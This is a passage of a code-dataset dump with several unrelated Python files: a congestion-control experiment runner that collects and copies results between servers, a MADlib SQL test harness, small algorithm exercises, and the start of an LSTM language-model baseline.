os.system(tput_cmd)\n s_time = \"%.0f\"%time.time()\n rtt_command = '~/genericCC/sender serverip='+HOST+' offduration=0 onduration=1000000 cctype=markovian delta_conf=do_ss:auto:0.5 traffic_params=deterministic > '+data_dir+'/'+rtt_filename\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n # os.system(tput_cmd)\n # returned_value = os.system(rtt_command)\n # print('returned value:', returned_value)\n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration+5 : # 15s: initial booting time \n os.system(su+' killall -9 sender')\n os.system(su+' killall -9 tcpdump')\n # tar_cmp = 'tar -cvf '+'~/copa.tar.gz '+data_dir+'/*'\n # os.system(tar_cmp)\n time.sleep(10)\n\n plot_file = '../client/new_plot_from_udp.py'\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n print(dir_list)\n for dir in dir_list:\n if dir.find('tput')>= 0:\n tput = dir\n if dir.find('rtt')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+rtt+' '+data_dir+'/copa_figure '+proto\n print(cmd)\n os.system(cmd)\n\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd 
= 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd) \n # cmd = 'rm '+data_dir+'/* '\n # os.system(cmd) \n break\n else:\n c_time = \"%.0f\"%time.time()\n\n # cmd = 'rm -rf ../../data/*'\n # os.system(cmd)\n #C2TCP\n elif proto == 'c2tcp':\n # # run server\n # cmd = 'python3 run_c2tcp.py'\n # os.system(cmd)\n cmd = su+' sysctl -w net.ipv4.tcp_congestion_control=cubic'\n os.system(cmd)\n cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=1'\n os.system(cmd)\n x=\"%.0f\"%time.time()\n tput_filename=\"c2tcp_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n tcp_probe_filename = \"tcpprobe_0.0.0.0_00000_\"+str(HOST)+\"_\"+str(PORT)+\"_download_1_foreground_\"+str(x)+\"_0.txt\"\n cmd_tcp_probe = su+\" cat /proc/net/tcpprobe > \"+data_dir+'/'+tcp_probe_filename+\" 2>&1\"\n p0 = subprocess.Popen(cmd_tcp_probe,shell=True)\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n\n rtt_command = su+' ~/c2tcp/server '+str(PORT)+' 0 200 1000'\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n print('duration is '+ str(duration))\n print('before_duration '+ str(duration))\n print(datetime.datetime.now())\n\n time.sleep(duration)\n print('after_duration '+ str(duration))\n print(datetime.datetime.now())\n os.system(su+' killall -9 server')\n os.system(su+' killall -9 tcpdump')\n os.system(su+' killall -9 cat')\n\n time.sleep(40)\n \n plot_file = '../client/new_plot_from_tcp.py'\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n tcpprobe = ''\n for dir in dir_list:\n if dir.find('c2tcp_2020') >= 0 and dir.find('Cell') < 0 :\n tput = dir\n elif dir.find('tcpprobe_') >= 0 and dir.find('png') < 0 :\n tcpprobe = dir\n\n # cmd = 'python3 '+plot_file+' '+new_result_dir+'/'+dir+' '+ new_result_dir+'/figire'\n # os.system(cmd)\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+tcpprobe+' '+data_dir+'/ '+proto\n print(cmd)\n os.system(cmd)\n\n if tcpprobe !='':\n print('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n os.system('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n os.system('mv ../../plot/* '+data_dir)\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd) \n # cmd = 'rm '+data_dir+'/* '\n # os.system(cmd) \n cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=0'\n os.system(cmd)\n\n # while(1):\n # print(int(c_time)-int(s_time))\n # if int(c_time)-int(s_time) > duration + :\n # os.system(su+' killall -9 server')\n # os.system(su+' killall -9 tcpdump')\n # os.system(su+' killall -9 cat')\n\n # time.sleep(10)\n \n # plot_file = '../client/new_plot_from_tcp.py'\n # dir_list = os.listdir(data_dir)\n # # dir = dir_list[0]\n # tcpprobe = ''\n # for dir in dir_list:\n # if dir.find('c2tcp_2020') >= 0 and dir.find('Cell') < 0 :\n # tput = dir\n # elif dir.find('tcpprobe_') >= 0 and dir.find('png') < 0 :\n # tcpprobe = dir\n\n # # cmd = 'python3 '+plot_file+' '+new_result_dir+'/'+dir+' '+ new_result_dir+'/figire'\n # # os.system(cmd)\n\n # # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n # cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+tcpprobe+' 
'+data_dir+'/ '+proto\n # print(cmd)\n # os.system(cmd)\n\n # if tcpprobe !='':\n # print('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n # os.system('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n # os.system('mv ../../plot/* '+data_dir)\n # new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n # cmd = 'mkdir ' + new_result_dir\n # os.system(cmd)\n\n # cmd = 'mv '+data_dir+'/* '+ new_result_dir \n # os.system(cmd) \n # # cmd = 'rm '+data_dir+'/* '\n # # os.system(cmd) \n # cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=0'\n # os.system(cmd)\n # break\n # else:\n # c_time = \"%.0f\"%time.time()\n\n\n # # server 1\n if server_name == 'server_1':\n tar_cmp = 'tar -cvf '+'~/backup1.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n cp_cmp = 'cp ~/backup1.tar.gz /mydata/www/html/tmp/'\n os.system(cp_cmp)\n\n # # server 2\n if server_name == 'server_2':\n tar_cmp = 'tar -cvf '+'~/backup2.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n scp_cmd = id_rsa+' ~/backup2.tar.gz user@000.000.000.000:/mydata/www/html/tmp/'\n print(scp_cmd)\n os.system(scp_cmd)\n # # server 3\n elif server_name == 'server_3':\n tar_cmp = 'tar -cvf '+'~/backup3.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n scp_cmd = id_rsa+' ~/backup3.tar.gz user@000.000.000.000:/mydata/www/html/tmp/'\n print(scp_cmd)\n os.system(scp_cmd)\n\n\n\nif multi == True and server_name == 'server_1':\n time.sleep(20)\n\n backup_tmp_folder_name_2 = '/mydata/www/html/tmp/' + server_name+'-'+str(today)+'-'+ str(x)+'-'+proto\n\n cmd = 'mkdir ' + backup_tmp_folder_name_2\n os.system(cmd)\n print(tcp_cc_list.count(proto))\n if tcp_cc_list.count(proto) <= 0 :\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup1.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n else:\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup1.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n\n # if tcp_cc_list.count(proto) <= 0 :\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n # else:\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n \n # if tcp_cc_list.count(proto) <= 0 :\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n # else:\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n\n cmd = 'rm /mydata/www/html/tmp/backup*'\n print(cmd)\n os.system(cmd)\n\n if proto == 'c2tcp' or proto == 'verus':\n cmd = 'rm -rf /mydata/www/html/tmp/server_1_'+str(proto)+'_*'\n print(cmd)\n os.system(cmd)\n","sub_path":"source/server/server_tcpfriend.py","file_name":"server_tcpfriend.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34156093","text":"from Utils import rnd, rand, cliffsDelta\nimport sys\nsys.path.insert(1, \"../\")\n\n\ndef testCliffs():\n assert(False == cliffsDelta([8, 7, 6, 2, 5, 8, 7, 3], [8, 7, 6, 2, 5, 8, 7, 
3]))\n assert(True == cliffsDelta([8, 7, 6, 2, 5, 8, 7, 3], [9, 9, 7, 8, 10, 9, 6]))\n t1, t2 = [], []\n for i in range(1, 1001):\n t1.append(rand())\n for i in range(1, 1001):\n t2.append(pow(rand(), 0.5))\n assert(False == cliffsDelta(t1, t1))\n assert(True == cliffsDelta(t1, t2))\n diff, j = False, 1.0\n while not diff:\n t3 = list(map(lambda x: x*j, t1))\n diff = cliffsDelta(t1, t3)\n print(\">\", rnd(j), diff)\n j = j*1.025\n \n\n\n","sub_path":"code/HW6/test/testCliffs.py","file_name":"testCliffs.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434557675","text":"'''\nMADlibTemplateTestCase is a subclass of GPDBTestCase that provides basic\ncababilities to run a templated SQL statement with substitution rules.\n\nFor any list parameters passed as \"template_vars\" it will iterate through\nall combinations\nof parameters and generate a separate test case for each combination.\n'''\n\nfrom madlib.src.template.sql import MADlibSQLTestCase\nfrom madlib.src.template.lib import PSQL1\nfrom madlib.src.test_utils.get_dbsettings import get_dbsettings\nfrom madlib.src.test_utils.utils import call_R_script\nfrom tinctest import TINCTestLoader\nfrom madlib.src.test_utils.utils import biprint\n# from tinctest.lib import Gpdiff\nfrom madlib.src.test_utils.utils import relative_mean_squared_error\nfrom madlib.src.test_utils.utils import read_sql_result\nfrom madlib.src.test_utils.utils import parse_single_SQL_output\nfrom madlib.src.test_utils.utils import parse_single_R_output\nfrom madlib.src.template.gpdiff import Gpdiff1\nfrom madlib.src.template.class_utils import make_sure_path_exists\nfrom madlib.src.template.class_utils import get_env_flag\nfrom madlib.src.template.class_utils import get_ext_ans\nfrom madlib.src.template.class_utils import get_skip\nfrom madlib.src.template.class_utils import clean_dir\nfrom madlib.src.test_utils.utils import unique_string\nimport os\nimport re\nimport sys\nimport shutil\nimport time\n\n# ------------------------------------------------------------------------\n# Use environment variables to control the behavior:\n#\n# CREATE_CASE to create case files\n# CREATE_ANS to create answer files (mainly for input test cases)\n# DB_CONFIG to pick a database configuration from settings.dbsettings\n# ------------------------------------------------------------------------\n\nclass MADlibTestCase (MADlibSQLTestCase):\n \"\"\"\n Abstract class for running templated SQL, subclasses\n must define the template\n \"\"\"\n # The following variables should be provided by subclass\n sql_dir_head = \"sql_\" # store the sql command executed\n out_dir_head = \"result_\" # output folder\n ans_dir = \"expected\" # expected results\n template = None\n template_method = None # method name, controls the file name\n template_doc = \"\"\n template_vars = {}\n skip_file = None # \"skip.py\"\n skip = []\n create_ans_ = False\n create_case_ = False\n db_settings_ = get_dbsettings(\"MADlibTestCase\", \"madlib\")\n schema_madlib = db_settings_[\"schema_madlib\"]\n schema_testing = db_settings_[\"schema_testing\"]\n reserved_keywords_ = [\"incr_\", \"schema_madlib\", \"schema_testing\",\n \"dbname_\", \"port_\"]\n\n # whether to clean all dirs\n clean_dirs_ = False\n\n # If you want to use fiel names like \"linregr_input_test_{incr}\",\n # increse incr for every test, which is done in the super class\n # This number is used for file name\n # to avoid putting very long arguments in the file 
name\n incr_ = 0 # name is hard-coded\n\n # ----------------------------------------------------------------\n\n @classmethod\n def dbKind(cls):\n \"\"\"\n greenplum or postgres\n \"\"\"\n return cls.db_settings_[\"kind\"]\n\n # ----------------------------------------------------------------\n\n @classmethod\n def dbVers(cls):\n \"\"\"\n get the version number\n \"\"\"\n ## get the first 2 digits from version number.\n ## example if version returned is 4.3.0, this function\n ## returns \"4.3\" as a string\n m = re.search(r\"^(\\d+\\.\\d+)\", cls.db_settings_[\"version\"])\n return m.group(1)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _make_sure_path_exists(cls, path):\n make_sure_path_exists(cls, path)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _get_env_flag(cls, flag, origin=False):\n \"\"\"\n Get the environment variable for\n creating case or answer file\n \"\"\"\n return get_env_flag(cls, flag, origin)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _get_ext_ans(cls, flag):\n \"\"\"\n Get the environment variable for\n creating answer file using\n external script, which takes in\n parameters and compute the results\n \"\"\"\n return get_ext_ans(cls, flag)\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _validate_vars(cls):\n \"\"\"\n To ensure that the usre provided template_vars\n does not contain the keywords\n \"\"\"\n if isinstance(cls.template_vars, dict):\n cls.template_vars = [cls.template_vars]\n elif isinstance(cls.template_vars, list):\n pass\n else:\n sys.exit(\"MADlib Test Error: template_vars must be \",\n \"a dict or an array of dict !\")\n for template_dict in cls.template_vars:\n if not isinstance(template_dict, dict):\n sys.exit(\"MADlib Test Error: template_vars must be \",\n \"a dict or an array of dict !!\")\n anyMatch = any(key in cls.reserved_keywords_\n for key in template_dict)\n if anyMatch:\n biprint(\"MADlib Test Error: template_vars should \",\n \"not use any of the following keywords:\")\n biprint(\", \".join(cls.reserved_keywords_))\n sys.exit(\"Testcase is stopping for \" + cls.__module__\n + \".\" + cls.__name__ + \" !\")\n return None\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _get_skip(cls):\n \"\"\"\n Get skip list\n \"\"\"\n return get_skip(cls)\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _write_params(cls, f, args):\n \"\"\"\n Write test parameters into the test case file\n \"\"\"\n for key in args:\n if (key not in cls.reserved_keywords_):\n f.write(\"-- @madlib-param \" + key + \" = \\\"\"\n + str(args[key]) + \"\\\"\\n\")\n return None\n\n # ----------------------------------------------------------------\n\n @classmethod\n def loadTestsFromTestCase(cls):\n \"\"\"\n @param cls The child class\n \"\"\"\n # Ensure we pickup the variables from our child class\n template = cls.template\n template_method = cls.template_method\n template_doc = cls.template_doc\n ## template_vars = cls.template_vars\n\n if template_method is None or template is None:\n # biprint(\"MADlib Test Error: \" + cls.__module__\n # + \".\" + cls.__name__ + \" !\")\n return []\n\n cls.create_case_ = cls._get_env_flag(\"CREATE_CASE\")\n cls.create_ans_ = cls._get_env_flag(\"CREATE_ANS\")\n (r_ans, r_script) = cls._get_ext_ans(\"R_ANS\")\n\n # validate cls template_vars\n 
cls._validate_vars()\n\n for template_dict in cls.template_vars:\n template_dict.update(\n schema_madlib=cls.db_settings_[\"schema_madlib\"],\n schema_testing=cls.db_settings_[\"schema_testing\"],\n dbname_=cls.db_settings_[\"dbname\"],\n port_=str(cls.db_settings_[\"port\"]))\n\n assert isinstance(template, str)\n assert isinstance(template_method, str)\n\n biprint(\"loading tests from test case\")\n\n source_file = sys.modules[cls.__module__].__file__\n source_dir = os.path.dirname(os.path.abspath(source_file))\n ans_dir = os.path.join(source_dir, cls.ans_dir)\n sql_dir = os.path.join(os.path.dirname(ans_dir),\n cls.sql_dir_head + cls.__name__)\n out_dir = os.path.join(os.path.dirname(ans_dir),\n cls.out_dir_head + cls.__name__)\n cls.ans_dir = ans_dir\n cls.sql_dir = sql_dir\n cls.out_dir = out_dir\n\n cls._make_sure_path_exists(sql_dir)\n cls._make_sure_path_exists(ans_dir)\n cls._make_sure_path_exists(out_dir)\n\n # ------------------------------------------------\n # Also create our \"Template\" test cases\n def makeTest(x):\n cls.incr_ += 1\n x[\"incr_\"] = cls.incr_\n methodName = TINCTestLoader.testMethodPrefix + \\\n template_method.format(**x)\n methodDoc = template_doc.format(**x)\n methodQuery = template.format(**x)\n\n ## Skip a test case\n add_flag = True\n for case in skip:\n eq = True\n for key in case:\n if str(x[key]).lower() != str(case[key]).lower():\n eq = False\n break\n if eq:\n add_flag = False\n break\n\n if cls.create_case_:\n # Create the SQL test case file that we are going to run\n sql_inputfile = os.path.join(sql_dir, methodName + \".sql\")\n with open(sql_inputfile, 'w') as f:\n if methodDoc == \"\" or methodDoc is None:\n f.write(\"-- @description \" + cls.__module__ + \".\"\n + cls.__name__ + \".\" + methodName + \"\\n\")\n else:\n if isinstance(methodDoc, str):\n f.write(\"-- @description \" + methodDoc + \"\\n\")\n else:\n sys.exit(\"MADlib Test Error: template_doc\",\n \" must be a string in\" +\n cls.__module__ + \".\" + cls.__name__)\n\n if add_flag is False:\n f.write(\"-- @skip ... by \" + cls.__module__ + \".\" +\n cls.__name__ + \"\\n\")\n\n biprint(methodName + \" ...... TEST CASE FILE CREATED\")\n\n cls._write_params(f, x)\n f.write(\"\\n\")\n f.write(methodQuery)\n\n # Call external script to compute the result\n # right now, only support R\n # But it is very easy to add support for other softwares\n if r_ans:\n output_msg = cls._get_env_flag(\"R_OUT\", False)\n t0 = time.time()\n if os.path.exists(r_script):\n call_R_script(r_script, ans_dir, methodName, x, output_msg)\n elif os.path.exists(\"./\" + r_script):\n call_R_script(\"./\" + r_script, ans_dir, methodName,\n x, output_msg)\n else:\n r_path = os.path.join(ans_dir, r_script)\n call_R_script(r_path, ans_dir, methodName, x, output_msg)\n t1 = time.time()\n biprint(cls.__name__ + \".\" + methodName +\n \" ... ANSWER GENERATED BY R ... \" +\n \"{dt:.2f}\".format(dt=(t1 - t0) * 1000.) +\n \" ms ... ok\")\n\n # ------------------------------------------------\n\n cls.clean_dirs_ = cls._get_env_flag(\"CLEANUP\")\n if cls.clean_dirs_:\n biprint(cls.__name__ + \" ...... 
cleaning up folders\")\n biprint(\"cleaning up test case files in \" + sql_dir)\n clean_dir(sql_dir, \"*\")\n # biprint(\"cleaning up answer files in \" + ans_dir)\n # clean_dir(ans_dir, \"*.ans\")\n biprint(\"cleaning up result files in \" + out_dir)\n clean_dir(out_dir, \"*\")\n return []\n\n # ------------------------------------------------\n # create test case files\n if cls.create_case_ or (cls.create_ans_ and r_ans):\n # if cls.create_case_:\n # clean_dir(sql_dir, \"*\")\n\n # if cls.create_ans_:\n # clean_dir(out_dir, \"*\")\n # # clean_dir(ans_dir, \"*.ans\")\n\n skip = cls._get_skip()\n\n for template_dict in cls.template_vars:\n makeTestClosure = makeTest\n kwargs = {}\n for key, value in template_dict.iteritems():\n if not isinstance(value, list):\n kwargs[key] = value\n else:\n def makefunc(key, values, f):\n def doit(k):\n for v in values:\n k[key] = v\n f(k)\n return doit\n makeTestClosure = makefunc(key, value, makeTestClosure)\n\n makeTestClosure(kwargs)\n\n # if R has already created answers, stop\n if ((not cls.create_case_ and not r_ans) or\n (cls.create_ans_ and (not r_ans))):\n # if cls.create_case_:\n # clean_dir(sql_dir, \"*\")\n\n # if cls.create_ans_:\n # clean_dir(out_dir, \"*\")\n # # clean_dir(ans_dir, \"*.ans\")\n\n # read files to create test cases\n return super(MADlibTestCase, cls).loadTestsFromTestCase()\n else:\n return []\n\n # ----------------------------------------------------------------\n\n def __init__(self, methodName, sql_file=None, db_name=None):\n super(MADlibTestCase,\n self).__init__(methodName, sql_file,\n self.__class__.db_settings_[\"dbname\"])\n\n # ----------------------------------------------------------------\n\n def _run_test(self, sql_file, ans_file):\n \"\"\"\n (1) Create a SQL script for the query\n (2) Run the SQL script using psql to produce the result file\n (3) Compare the result file to the expected answer file\n \"\"\"\n sql_resultfile = os.path.join(self.get_out_dir(),\n os.path.basename(sql_file) + \".out\")\n\n # create the output of SQL script\n db = self.__class__.db_settings_\n PSQL1.run_sql_file(sql_file, out_file=sql_resultfile,\n dbname=db[\"dbname\"],\n username=db[\"username\"],\n password=db[\"userpwd\"],\n host=db[\"host\"],\n port=db[\"port\"],\n PGOPTIONS=db[\"pg_options\"],\n psql_options=db[\"psql_options\"])\n\n # First run to create the baseline file\n if self.__class__.create_ans_:\n shutil.copyfile(sql_resultfile, ans_file)\n os.remove(sql_resultfile)\n biprint(\"ANSWER FILE CREATED ... 
\", syswrite=True)\n return True\n\n return self.validate(sql_resultfile, ans_file)\n\n # ----------------------------------------------------------------\n\n def validate(self, sql_resultfile, answerfile):\n # Check that the answer file exists\n self.assertTrue(os.path.exists(answerfile))\n\n tmp = unique_string()\n res1 = self._filter_file(sql_resultfile, tmp, \"sql.out\")\n ans1 = self._filter_file(answerfile, tmp, \"ans\")\n\n cmp = Gpdiff1.are_files_equal(res1, ans1)\n\n diff_file = res1.replace(\"out\", \"diff\")\n if os.path.exists(diff_file):\n os.system(\"mv -f \" + diff_file + \" \" +\n sql_resultfile.replace(\"out\", \"diff\"))\n\n # clean up\n os.system(\"rm -f \" + res1 + \" \" + ans1)\n\n # Compare actual result to the answer\n return cmp\n\n # -----------------------------------------------------------------\n\n def _filter_file(self, filename, tmpbase, extension):\n \"\"\" Copy filename to /tmp/tmpbase.ans (or sql.out)\n Filter somthing if needed\n \"\"\"\n tmpfile = \"/tmp/\" + tmpbase + \".\" + extension\n to = open(tmpfile, \"w\")\n context_skip = False\n query_skip = False\n error_found = False\n all_skip = False\n for line in open(filename, \"r\"):\n if re.match(\"^.*\\s+(?i)error:\", line):\n error_found = True\n all_skip = True\n if line.startswith(\"QUERY:\"):\n if error_found:\n all_skip = True\n query_skip = True\n if line.startswith(\"CONTEXT:\"):\n if error_found:\n all_skip = True\n context_skip = True\n query_skip = False\n if re.match(\"^\\s*(select|drop)\", line):\n context_skip = False\n if context_skip or query_skip: continue\n # All the messages after \"\\\\n\" will be ignored by GPdiff\n to.write(line)\n \n if all_skip: break\n to.close()\n return tmpfile\n\n # ----------------------------------------------------------------\n\n def compare_outputs(self, sql_resultfile, answerfile, keys,\n ignore=[], #\n grouping=[], # grouping columns\n skip_null=True, # do not compare NULL\n compare=relative_mean_squared_error,\n threshold=1e-6):\n \"\"\"\n Compare the result file with answer file\n \"\"\"\n if isinstance(threshold, list):\n if len(threshold) != len(keys):\n raise Exception(\"Threshold number is different from keys number!\")\n else:\n threshold = [threshold] * len(keys)\n\n r_res = parse_single_R_output(answerfile, keys)\n\n sql_dict = {}\n for i, key in enumerate(keys):\n sql_dict[key] = i\n\n sql_result = read_sql_result(sql_resultfile)\n sql_res = parse_single_SQL_output(sql_result[\"result\"], sql_dict)\n\n flag = True\n if grouping != [] and isinstance(r_res, list):\n if len(sql_res) != len(r_res):\n raise Exception(\"The numbers of groups of R and SQL are different!\")\n count = 0\n for i in range(len(r_res)):\n for j in range(len(sql_res)):\n if (dict((k, r_res[i][k]) for k in grouping) ==\n dict((k, sql_res[j][k]) for k in grouping)):\n count += 1\n if len(sql_res[j]) != len(r_res[i]):\n raise Exception(\"The numbers of result items of R and SQL \"\n \"are different!\")\n for k, params in enumerate(keys):\n if skip_null and (sql_res[j][params] == [\"\"] or\n sql_res[j][params] == [] or\n r_res[i][params] == [\"NA\"] or\n r_res[i][params] == []):\n continue\n if (params not in ignore and params not in grouping and\n compare(sql_res[j][params], r_res[i][params]) > threshold[k]):\n # biprint(\"Assertion for \" + params + \" failed!\")\n raise ValueError(\"Assertion for \" + params + \" failed!\")\n flag = False\n if flag and count != len(r_res): flag = False\n else:\n if len(sql_res) != len(r_res):\n raise Exception(\"The numbers of result items 
of R and SQL \"\n \"are different!\")\n for k, params in enumerate(keys):\n if skip_null and (sql_res[params] == [\"\"] or\n sql_res[params] == [] or\n r_res[params] == [\"NA\"] or\n r_res[params] == []):\n continue\n if (params not in ignore and params not in grouping and\n compare(sql_res[params], r_res[params]) > threshold[k]):\n # biprint(\"Assertion for \" + params + \" failed!\")\n raise ValueError(\"Assertion for \" + params + \" failed!\")\n flag = False\n return flag\n","sub_path":"src/template/madlib_test.py","file_name":"madlib_test.py","file_ext":"py","file_size_in_byte":20198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"502301936","text":"# encoding: utf-8\nimport random\n\n\ndef recquickSort(arr, first, last):\n if first >= last:\n return\n\n pos = findPos(arr, first, last)\n\n recquickSort(arr, first, pos-1)\n recquickSort(arr, pos+1, last)\n\n\ndef findPos(arr, first, last):\n base = arr[first]\n i = first + 1\n j = last\n while i <= j:\n while i <= j and arr[i] < base:\n i += 1\n while j >= i and arr[j] >= base:\n j -= 1\n if i < j:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n j -= 1\n\n arr[first], arr[j] = arr[j], arr[first]\n return j\n\n\nif __name__ == \"__main__\":\n arr = [random.randint(0, 10) for i in range(10)]\n print(arr)\n recquickSort(arr, 0, len(arr)-1)\n print(arr)\n","sub_path":"datastructures/sorts/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602668595","text":"# http://community.topcoder.com/stat?c=problem_statement&pm=12794\n\ndef get_number(balls):\n curr_seq = 1\n max_seq = 1\n if len(balls) == 1:\n return 0\n\n for idx in xrange(len(balls)):\n if balls[idx - 1] == balls[idx]:\n curr_seq += 1\n else:\n curr_seq = 1\n max_seq = max(max_seq, curr_seq)\n return len(balls) - max_seq\n\n\nif __name__ == '__main__':\n assert 4 == get_number('RRGGBB')\n assert 5 == get_number('RGBRGB')\n assert 3 == get_number('RGGGBB')\n assert 46 == get_number('RGBRBRGRGRBBBGRBRBRGBGBBBGRGBBBBRGBGRRGGRRRGRBBBBR')\n assert 0 == get_number('R')\n","sub_path":"topcoder/little_elephant_and_balls_again/little_elephant_and_balls_again.py","file_name":"little_elephant_and_balls_again.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274564668","text":"import numpy as np\nimport tensorflow as tf\n\nfrom models.tf_model import TFModel\nfrom models.base_model import convert_tokens_to_input_and_target\n\n\nclass LSTMBaseline(TFModel):\n \"\"\"LSTM language model\n\n Trained on songs from the meta-training set. 
During evaluation,\n ignore each episode's support set and evaluate only on query set.\n \"\"\"\n\n def __init__(self, config):\n super(LSTMBaseline, self).__init__(config)\n\n def _define_placedholders(self):\n # Add start word that starts every song\n # Adding start word increases the size of vocabulary by 1\n self._start_word = self._config['input_size']\n self._input_size = self._config['input_size'] + 1\n\n self._time_steps = self._config['max_len']\n self._embd_size = self._config['embedding_size']\n self._hidden_size = self._config['hidden_size']\n self._n_layers = self._config['n_layers']\n self._lr = self._config['lr']\n self._max_grad_norm = self._config['max_grad_norm']\n\n self._batch_size = tf.placeholder(tf.int32, shape=())\n self._seq_length = tf.placeholder(tf.int32, [None])\n self._words = tf.placeholder(\n tf.int32, [None, self._time_steps])\n self._target = tf.placeholder(\n tf.int32, [None, self._time_steps])\n\n def _build_graph(self):\n embedding = tf.get_variable(\n 'embedding', [self._input_size, self._embd_size])\n inputs = tf.nn.embedding_lookup(embedding, self._words)\n inputs = tf.unstack(inputs, axis=1)\n\n def make_cell():\n return tf.contrib.rnn.BasicLSTMCell(\n self._hidden_size, forget_bias=1., state_is_tuple=True)\n\n self._cell = tf.contrib.rnn.MultiRNNCell(\n [make_cell() for _ in range(self._n_layers)])\n self._initial_state = self._cell.zero_state(\n self._batch_size, dtype=tf.float32)\n outputs, state = tf.nn.static_rnn(\n self._cell, inputs, initial_state=self._initial_state,\n sequence_length=self._seq_length)\n self._state = state\n\n output = tf.concat(outputs, 1)\n self._output = tf.reshape(output, [-1, self._hidden_size])\n\n softmax_w = tf.get_variable(\n 'softmax_w', [self._hidden_size, self._input_size])\n softmax_b = tf.get_variable('softmax_b', [self._input_size])\n # Reshape logits to be a 3-D tensor for sequence loss\n logits = tf.nn.xw_plus_b(self._output, softmax_w, softmax_b)\n logits = tf.reshape(\n logits, [self._batch_size, self._time_steps, self._input_size])\n self._logits = logits\n self._prob = tf.nn.softmax(self._logits)\n\n self._avg_neg_log = tf.contrib.seq2seq.sequence_loss(\n logits,\n self._target,\n tf.ones([self._batch_size, self._time_steps], dtype=tf.float32),\n average_across_timesteps=True,\n average_across_batch=True)\n\n lr = tf.train.exponential_decay(\n self._lr,\n self._global_step,\n self._config['n_decay'], 0.5, staircase=False\n )\n optimizer = tf.train.AdamOptimizer(lr)\n grads, _ = tf.clip_by_global_norm(tf.gradients(self._avg_neg_log,\n self.get_vars()),\n self._max_grad_norm)\n self._train_op = optimizer.apply_gradients(zip(grads, self.get_vars()),\n self._global_step)\n\n def train(self, episode):\n \"\"\"Concatenate query and support sets to train.\"\"\"\n X, Y = convert_tokens_to_input_and_target(\n episode.support, self._start_word)\n X2, Y2 = convert_tokens_to_input_and_target(\n episode.query, 